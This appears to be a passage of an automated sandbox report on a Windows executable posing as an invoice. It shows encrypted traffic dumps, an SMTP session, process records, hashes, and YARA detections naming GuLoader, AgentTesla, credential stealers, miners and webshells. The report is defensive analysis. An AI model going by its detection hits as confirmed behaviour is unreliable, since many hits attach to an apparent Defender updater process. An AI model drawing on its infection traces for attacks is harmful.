56 5e 4a 1c b8 cd 4d ed c2 41 ca 14 7f d9 26 99 f6 85 4b db e1
                                                                                                                              Data Ascii: SW]F?Uk9&nZi-E0X]K<!g|$c. @Q#DM^?b;X;V+2DvGkhI88h'!hG+ge8%$7lOK^\,7icx*v+m4rGNwZAsfkZidV^JMA&K
                                                                                                                              2021-10-12 14:35:51 UTC201INData Raw: e7 18 ea a0 93 46 86 3f 74 4b 13 c8 5c 76 3d 55 80 a0 5b 06 2e 63 d2 01 49 d1 3f 42 32 14 76 55 fc 3e 8b 04 de 7d 89 5e d1 44 5e c7 83 60 b0 3d 62 03 ab 2e ff dd 3f 42 cc df 87 2b 47 c6 75 f3 28 57 8c 6e 24 0d 54 df 5f 5b 88 73 97 e4 e9 38 77 2e b1 cc c6 45 7a f7 93 7d bc 37 cf 9f 10 78 17 0d 88 3d e6 8d 8b 05 89 1e 93 bc 0c fa 59 2b 91 15 96 3b b7 aa 29 35 34 16 c1 b5 5b bb 62 c7 21 0b b9 bd 45 2d 0f d4 35 96 4e 86 eb 67 02 88 45 0c 04 0a c8 b9 b5 32 ee 6b 15 0b 3e 8c 20 a7 27 37 17 04 fc 61 33 b0 18 39 c1 45 41 33 0a 96 9d 6b 24 1e 6b 23 02 0d 4e 89 ad 0e 56 40 ce 15 23 1a 97 86 7f 6e 56 50 10 1e 82 ba dc 53 fe ae 3f 72 6b 1e 42 e3 fd fd 01 57 e4 d6 4a 82 64 db 3a 79 aa ba 35 20 49 1a 51 47 cf 92 3a f7 74 53 72 1c 97 b8 d7 eb 4c 50 b7 74 a1 76 c9 bb fc
                                                                                                                              Data Ascii: F?tK\v=U[.cI?B2vU>}^D^`=b.?B+Gu(Wn$T_[s8w.Ez}7x=Y+;)54[b!E-5NgE2k> '7a39EA3k$k#NV@#nVPS?rkBWJd:y5 IQG:tSrLPtv
                                                                                                                              2021-10-12 14:35:51 UTC203INData Raw: d4 31 0d c6 d1 5a 23 d5 4f 32 dd ad 5d 89 8f 58 95 77 13 cd 3b c6 ec 28 8c be 09 ef 94 58 06 5b 02 09 f1 6c bb d4 8c 75 d9 bd 6b ff 55 80 46 f8 63 e5 aa cc 58 b7 bc fa de 22 03 d7 0f b1 3c 57 42 be d6 f7 f8 3a c2 0a 0f fd 57 d2 4e 01 5f 04 59 26 51 12 1e 09 83 62 04 e7 2d dd 7e 3f b9 e1 54 96 ea 40 b3 3d c7 d2 4c 21 32 b7 97 9f 46 02 9b 7a 87 fc ca f8 83 5f a3 a0 94 dd 06 b4 02 d6 c6 c7 ef 9c 35 0b 51 b5 9a d9 95 bb a6 7c 27 63 03 d6 f1 c7 5a 90 f8 e0 f5 c5 c7 c7 31 da e4 9f 5b fa aa 5f 94 04 7e 18 ac 68 d1 21 b5 82 3f af dd c7 dd ff da 9b 7f e9 7b 4c 55 e7 5b b0 24 fc 10 85 69 6b c0 b9 83 88 f1 d7 e6 4e 2a 6f f6 39 c5 38 d9 50 ec 05 74 ae ff de 72 73 49 48 91 d1 3e 4e 5b 7d b2 68 68 5f fb 73 bf 65 56 73 c2 7c 56 3d 31 d7 c7 58 f8 ef 77 f1 09 6b c4 03 9b
                                                                                                                              Data Ascii: 1Z#O2]Xw;(X[lukUFcX"<WB:WN_Y&Qb-~?T@=L!2Fz_5Q|'cZ1[_~h!?{LU[$ikN*o98PtrsIH>N[}hh_seVs|V=1Xwk


                                                                                                                              SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Oct 12, 2021 16:37:27.472767115 CEST | 587 | 49795 | 188.93.227.195 | 192.168.11.20 | 220-iberweb-11a.ibername.com ESMTP Exim 4.94.2 #2 Tue, 12 Oct 2021 15:37:25 +0100
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Oct 12, 2021 16:37:27.473258018 CEST | 49795 | 587 | 192.168.11.20 | 188.93.227.195 | EHLO 210979
Oct 12, 2021 16:37:27.524290085 CEST | 587 | 49795 | 188.93.227.195 | 192.168.11.20 | 250-iberweb-11a.ibername.com Hello 210979 [102.129.143.96]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPE_CONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Oct 12, 2021 16:37:27.524652958 CEST | 49795 | 587 | 192.168.11.20 | 188.93.227.195 | STARTTLS
Oct 12, 2021 16:37:27.579057932 CEST | 587 | 49795 | 188.93.227.195 | 192.168.11.20 | 220 TLS go ahead

                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              Behavior

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Start time:16:35:08
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Users\user\Desktop\FAKTURA I PARAGONY.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:102400 bytes
                                                                                                                              MD5 hash:0277CE10266C718B31D46A622ACF1A43
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:Visual Basic
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2628573263.0000000002270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:16:35:30
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Users\user\Desktop\FAKTURA I PARAGONY.exe'
                                                                                                                              Imagebase:0xd10000
                                                                                                                              File size:65440 bytes
                                                                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:35:30
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff63a230000
                                                                                                                              File size:875008 bytes
                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              General

                                                                                                                              Start time:16:41:42
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                              Imagebase:0x7ff713d80000
                                                                                                                              File size:57856 bytes
                                                                                                                              MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:16:41:47
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe' /q WD
                                                                                                                              Imagebase:0x7ff7eddd0000
                                                                                                                              File size:16343496 bytes
                                                                                                                              MD5 hash:C4DB3EC80A8918D80B802B6DA145FD82
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low

                                                                                                                              General

                                                                                                                              Start time:16:41:50
                                                                                                                              Start date:12/10/2021
                                                                                                                              Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.265.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-51041e98.exe /q WD
                                                                                                                              Imagebase:0x7ff7689a0000
                                                                                                                              File size:803176 bytes
                                                                                                                              MD5 hash:01F92DC7A766FF783AE7AF40FD0334FB
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_gogoogle, Description: Yara detected GoGoogle ransomware, Source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: APT9002Strings, Description: 9002 Identifying Strings, Source: 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp, Author: Seth Hardy
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000023.00000003.6278239354.0000028BD7D54000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth)
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000023.00000003.6343112775.0000028BD6735000.00000004.00000001.sdmp, Author: Cylance
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth
                                                                                                                              • Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: USG
                                                                                                                              • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: yara@s3c.za.net
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Ham_backdoor, Description: unknown, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: Cylance Spear Team
                                                                                                                              • Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, Author: David Cannings
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp, Author: FireEye
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000023.00000003.6347513149.0000028BD7280000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: SUSP_Script_Obfuscation_Char_Concat, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6269974258.0000028BD77B8000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team
                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team
                                                                                                                              • Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, Author: unknown
                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth)
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000023.00000003.6298208897.0000028BD6B04000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                                                              • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                              • Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, Author: Joe Security
